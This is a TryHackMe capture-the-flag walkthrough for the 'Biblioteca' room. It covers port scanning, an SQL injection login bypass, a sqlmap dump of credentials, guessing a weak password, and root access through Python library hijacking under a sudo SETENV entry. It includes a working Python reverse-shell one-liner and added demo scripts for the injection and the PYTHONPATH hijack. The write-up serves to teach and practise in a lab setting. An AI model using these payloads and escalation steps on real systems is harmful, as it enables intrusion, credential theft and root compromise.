Hey folks! This time, let's root the Biblioteca room, rated Medium in TryHackMe. Let's root!
Let's start with port scanning:
rustscan -a $IP --ulimit 5000 | tee rustscan.txt
Rustscan shows two open ports: 22 (SSH) and 8000 (HTTP).
Let's dig deeper into these ports with nmap's default scripts and version detection:
nmap -sC -sV -p22,8000 -Pn -oN nmap $IP
I checked port 8000 first, since I didn't have any SSH credentials 🙂
On the HTTP site there was a login page.
I created an account and logged in,
but there was nothing behind it, which was fishy.
I ran a gobuster scan, but it didn't turn up any other pages.
Then I tried SQLi, and guess what? It worked.
I put a simple payload in the password field, i.e.
'or 1=1 -- and we got logged in to another user's account named smokey! The quote closes the password string, 1=1 makes the WHERE clause true for every row, and the -- comments out whatever the application appends, so the first matching user is returned.
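To make the bypass concrete, here is an added example (not the room's application code; the real backend is not shown in the walkthrough). It builds a throwaway SQLite users table with constructed sample rows, runs the login check the insecure way (string formatting) and the safe way (bound parameters), and returns which account each one resolves to. The account you land in after a bypass is simply the first row the scan returns, which is why the room logged us in as smokey rather than as the account we registered:

```python
import sqlite3

# Constructed fixture standing in for the room's users table; none of these
# values come from the box. Passwords are stored in clear here only because
# the login query compares them directly, which is itself a weakness.
SEED_USERS = [
    ("smokey", "smokey@example.com", "s3cret"),
    ("guest", "guest@example.com", "guest"),
]

# The walkthrough's payload; the trailing space after -- matters for MySQL,
# which only treats "-- " followed by whitespace as a comment. SQLite does not care.
PAYLOAD = "' or 1=1 -- "


def make_db():
    """In-memory SQLite database with a minimal users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "email TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, email, password) VALUES (?, ?, ?)", SEED_USERS
    )
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """The query as an injectable application would assemble it."""
    return (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )


def login_vulnerable(conn, username, password):
    """String formatting lets quotes in the input change the query's structure.

    With PAYLOAD as the password the statement becomes
      ... WHERE username = 'x' AND password = '' or 1=1 -- '
    AND binds tighter than OR, so every row matches and fetchone() returns the
    first one in table order.
    """
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters; the input is only ever data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query("attacker", PAYLOAD))
    print("vulnerable login ->", login_vulnerable(db, "attacker", PAYLOAD))
    print("parameterised login ->", login_safe(db, "attacker", PAYLOAD))
```

Run it and the vulnerable path returns smokey for a username that does not exist, while the parameterised path returns nothing; the only difference is whether the payload is concatenated into the SQL text or passed as a bound value.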
I quickly fired up Burp Suite, captured the login request and saved it to a file, then handed it to sqlmap:
sqlmap -r sql.req --dbs --dump
and got the usernames, emails and passwords from the dumped database.
SSH in with those credentials and go for the user flag.
But wait, we don't have permission to read user.txt, because it is owned by another user named hazel.
After spending some time on post-compromise recon, I didn't find anything.
Later I checked TryHackMe's official Discord for the room's discussion channel and learned that hazel's password was VERY weak.
At first I ran hydra with 100 common passwords from SecLists, which failed.
Then, in frustration, I tried the username as the password and it worked, i.e. the password is the username (hazel:hazel).
Now I got user.txt.
If you have a user's password, the first thing to run is sudo -l 😃
I saw the SETENV tag on the entry, which means we can set environment variables on the sudo command line while running the listed command as root! Without it, sudo's default env_reset would strip a variable like PYTHONPATH before the command ever ran.
Viewing the hasher.py file shows a Python script that imports the standard hashlib module.
After some research/googling I came across 2 blogs/articles which were very helpful (links are at the end).
The technique is Python library hijacking: a module of our own with the same name as a standard-library module, placed earlier in the import search path. In short, to hijack it, follow these steps:
Find the location of the Python library the script is using; in our case it's /usr/lib/python3.8/
Copy the real hashlib.py to /tmp so the script keeps working after we add our code:
cp /usr/lib/python3.8/hashlib.py /tmp/hashlib.py
Add the reverse shell to /tmp/hashlib.py (at top level, anywhere in the file, so it runs as soon as the module is imported).
Reverse shell used (replace your_IP with your listener's address):
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
Start the listener on the port used in the payload:
nc -lnvp 1234
To get the shell, run the command with PYTHONPATH pointing at the directory holding our hashlib.py:
sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/hazel/hasher.py
The PYTHONPATH environment variable lists directories that Python prepends to its module search path, ahead of the standard library, so a module there shadows the standard one of the same name. Because sudo runs the script as root and SETENV lets PYTHONPATH through, our hashlib.py is imported by a root process.
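To see the import precedence that the hijack relies on, here is an added example (not the room's hasher.py and not from the linked articles). It plants a harmless stand-in hashlib.py in a temporary directory, then asks a fresh interpreter where import hashlib resolves with and without PYTHONPATH pointing at that directory. The marker-only shim, the temporary directory and the use of a subprocess are all assumptions of the demo; on the box the directory is /tmp, the extra code is the reverse shell, and the fresh interpreter is the one sudo starts as root:

```python
import os
import subprocess
import sys
import tempfile

# Constructed stand-in for the real module. The walkthrough copies the genuine
# hashlib.py and appends a reverse shell; here the "payload" is only a marker,
# enough to prove that the interpreter loaded our file instead of the one under
# /usr/lib/python3.x/.
SHIM_SOURCE = "HIJACKED = True\n"


def module_origin(module, pythonpath=None):
    """Spawn a fresh interpreter and return the file `import <module>` resolved to.

    A new process is needed because the import system caches modules, so the
    hijack has to be observed from a process that starts with the poisoned
    environment, exactly as `sudo PYTHONPATH=/tmp/ python3 hasher.py` does.
    -S skips site.py so stray .pth files cannot influence the demonstration.
    """
    env = dict(os.environ)
    env.pop("PYTHONPATH", None)            # baseline: nothing caller-controlled
    if pythonpath is not None:
        env["PYTHONPATH"] = pythonpath     # attacker-controlled, as SETENV allows
    code = f"import {module}; print({module}.__file__)"
    proc = subprocess.run(
        [sys.executable, "-S", "-c", code],
        env=env, capture_output=True, text=True, check=True,
    )
    return proc.stdout.strip()


def plant_shim(directory, module):
    """Write <directory>/<module>.py, mirroring the cp-then-edit step in /tmp."""
    path = os.path.join(directory, module + ".py")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(SHIM_SOURCE)
    return path


def demonstrate(module="hashlib"):
    """Report where `module` loads from with and without a poisoned PYTHONPATH."""
    with tempfile.TemporaryDirectory() as tmp:   # stands in for /tmp on the box
        shim = plant_shim(tmp, module)
        baseline = module_origin(module)
        hijacked = module_origin(module, pythonpath=tmp)
        return {
            "shim": shim,
            "baseline": baseline,
            "hijacked": hijacked,
            # True when the import resolved to our file rather than the stdlib copy
            "hijack_worked": os.path.realpath(hijacked) == os.path.realpath(shim),
            # Sanity check: without PYTHONPATH the standard library copy is used
            "baseline_is_stdlib": os.path.realpath(baseline) != os.path.realpath(shim),
        }


if __name__ == "__main__":
    for key, value in demonstrate().items():
        print(f"{key}: {value}")
```

The same one-liner, python3 -c "import hashlib; print(hashlib.__file__)", is a quick check on a target: if the path it prints is not under the interpreter's own lib directory, the search path has already been tampered with. On the defensive side the fix is the sudoers entry, not the script: drop the SETENV tag (or use the NOSETENV tag) so env_reset keeps PYTHONPATH out of the root process.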
And there we go, I got the shell. Stabilize the shell and read the root.txt file.
So with this, we have completed the room.